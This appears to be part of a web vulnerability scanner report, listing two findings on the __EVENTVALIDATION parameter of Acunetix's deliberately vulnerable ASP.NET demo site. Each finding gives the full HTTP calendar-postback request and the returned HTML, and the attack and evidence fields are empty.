Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8367&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAuftPQ2ghkZGRYNdkjwXcn5WDYklXAchL1uVWfew%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkyIHJBQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6dnDpVnXdwpd2o5095x7%2FTwGgd
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:20 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAuftPQ2ghkZGRYNdkjwXcn5WDYklXAchL1uVWfew==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkyIHJBQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6dnDpVnXdwpd2o5095x7/TwGgd" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:White" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8549&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAXaXXX9sIZGRkmMbfJd58XpzZX5HdVro6GolLsXY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKL2arHDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMZIfhfRArJ1sWn%2Fa0ou9d4FiZZpU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:03 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAXaXXX9sIZGRkmMbfJd58XpzZX5HdVro6GolLsXY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKL2arHDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMZIfhfRArJ1sWn/a0ou9d4FiZZpU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:White" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
